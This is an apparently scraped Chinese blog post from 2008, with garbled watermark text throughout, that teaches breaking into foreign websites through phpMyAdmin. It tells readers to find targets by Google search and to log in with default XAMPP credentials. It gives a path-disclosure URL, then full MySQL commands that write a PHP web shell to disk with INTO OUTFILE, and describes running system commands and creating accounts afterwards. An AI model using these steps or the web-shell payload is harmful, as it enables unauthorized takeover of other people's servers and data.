利用phpmyadmin弱口令入侵国外站

上一篇 / 下一篇  2008-12-01 07:38:47

查看( 55 ) / 评论( 0 ) / 评分( 0 / 0 )
作者:小波IXPUB技术博客%XpxI.j)D'^uL
地址:www.byxiaobo.com.cnIXPUB技术博客%xT#Dw.m%{
我们已知xampp下有mysql phpmyadmin ftp 等 都是功能强大程序
#t k)I`5jl3w0我们何不去利用呢?而且很多国外管理员都很懒很少 改密码!因此给了我们入侵的机会!
}NaYb:{)P0呵呵!列如xampp的默认密码,帐号newuser  密码:wampp
1^L.Z'{-M._(R3Dmky]0我们可以常识ftp登陆dos下传1.php文件来完成我们的入侵!IXPUB技术博客y5FF&D1iI
不过今天我们讲的是phpmyadmin 不离题额!下次讲xampp的ftp默认帐号密码情况入侵
vZ!d/}iI&cVeUAb0我也搞了动画出来了,下载地址:http://www.focusingchina.net/down/donghua/ftp.rarIXPUB技术博客O&{ B$W w `W&D8R nm
打开google 搜索:phpmyadmin/index.php  大家可以更改其他关键词
t }lT^;i4}:n0
&Oai7i[A:E*DC0呵呵,我就随便拿个phpmyadmin来演示吧!你们可以自己试搜索更多的关键词IXPUB技术博客 H&V%X f~6v4S
我想很多 都是国外的 而且可以直接访问数据库的!如图IXPUB技术博客V.n0~N\s

#EOCG i8H0H2xV0当然看到这个页面我们就想到 导出SHELL 需要得到系统路径怎么办呢?
+` k#B)d#E"kw\e'M0其实很简单暴出phpmyadmin的绝对路径
(Jt%{Gl)Gfs0漏洞地址:phpmyadmin/themes/darkblue_orange/layout.inc.php 如图
7jn!T2taV0
J7Z(fn;?7de7z0呵呵,得到了 路径当然是去 建表导SHELL了,呵呵IXPUB技术博客S1m.q.I FM#D
IXPUB技术博客@3I/imM4Q/j2Q9g.am1c
MySQL命令建设小波并保存到本地路径XIXPUB技术博客 @M;nS d|I o+NE
Create TABLE `xiaobo` (`xiaobo` TEXT NOT NULL) TYPE = MYISAM; Insert INTO `xiaobo` ( `xiaobo` ) VALUES ('<?php $cmd = $_GET["cmd"];system($cmd);?>');
jw3nGE`1B0Select `xiaobo` FROM `xiaobo` INTO OUTFILE '这里写系统路径'; Drop TABLE `xiaobo`;IXPUB技术博客H9f us+y9R.go
然后把xiaobo 改成你们喜欢用的表吧!然后选择数据库在点SQL备分,如图
$?1nS0q m0
#B2Ow/Hbh0成功了,打开webshell 执行命令 如图
'bhlh3GspDe0
4C"M$wKW}2o+x(dkZ0呵呵 成功建立了帐户,基于root给予我们狠强大的 权限!
-c"u`BM:G0在提醒 新手朋友们!一般国外的的系统都会把Administrators管理组 换成别的 我们可以用命令来查IXPUB技术博客EcPeKNb
管理员的管理组!呵呵,罗嗦一下 别骂我吖!by小波 欢迎大家常来我blog吹吹牛 俺会经常更新一些基础IXPUB技术博客C(T&??E2T"qUp

2

2

导入论坛 引用链接 收藏 分享给好友 推荐到圈子 管理 举报

TAG:

 

评分:0

我来说两句

显示全部

:loveliness: :handshake :victory: :funk: :time: :kiss: :call: :hug: :lol :'( :Q :L ;P :$ :P :o :@ :D :( :)

日历

« 2009-01-06  
    123
45678910
11121314151617
18192021222324
25262728293031

数据统计

  • 访问量: 65531
  • 日志数: 1209
  • 文件数: 1
  • 建立时间: 2007-08-10
  • 更新时间: 2009-01-06

RSS订阅

Open Toolbar